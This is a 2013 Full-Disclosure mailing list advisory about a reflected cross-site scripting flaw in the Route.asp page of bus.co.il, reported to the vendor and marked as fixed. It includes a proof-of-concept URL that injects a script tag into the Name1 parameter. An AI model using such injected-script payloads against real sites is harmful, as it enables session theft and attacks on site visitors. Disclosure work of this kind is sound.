[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Bus.co.il - Route.asp Cross-site Scripting vulnerability
- To: full-disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Bus.co.il - Route.asp Cross-site Scripting vulnerability
- From: LIAD Mizrachi <liadmz@xxxxxxxxx>
- Date: Mon, 8 Jul 2013 16:29:15 +0300
Advisory: www.bus.co.il - Route.asp Cross-site Scripting vulnerability
Author: Liad Mizrachi
Vendor URL: http://www.bus.co.il
Vulnerability Status: Fixed
==========================
Vulnerability Description
==========================
'Name1' & 'Name2' - Parameters in "Route.asp" are prone to a XSS.
==========================
PoC
==========================
// IE 9 & FF 21.0
http://www.bus.co.il/otobusim/Front2007/Route.asp?RouteID=1&PlaceID1=196357&BuildingNumber1=0&PlaceID2=347360&BuildingNumber2=0&Name1=%3cscript%3ealert(%22XSS%22)%3c/script%3e&Name2=%D7%91%D7%AA+%D7%99%D7%9D+-+%D7%A1%D7%9E%D7%98%D7%AA+%D7%94%D7%A8%D7%90%D7%A9%D7%95%D7%A0%D7%99%D7%9D&StartPlaceID1=639500&EndPlaceID1=619400&DepTime1=17:02&ArrTime1=17:25&TravelID1=380437889&LineID1=4563409&LineCompanyID1=1010&BeforeWalkTime1=0:01&AfterWalkTime=5.17572916666653E-03&LanguageID=&Design=2007
==========================
Solution
==========================
fixed by vendor (verified)
==========================
Disclosure Timeline
==========================
24-June-2013 - vendor informed by mail
27-June-2013 - fixed by the vendor
==========================
References
==========================
http://www.bus.co.il/
http://picturepush.com/public/13422462
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/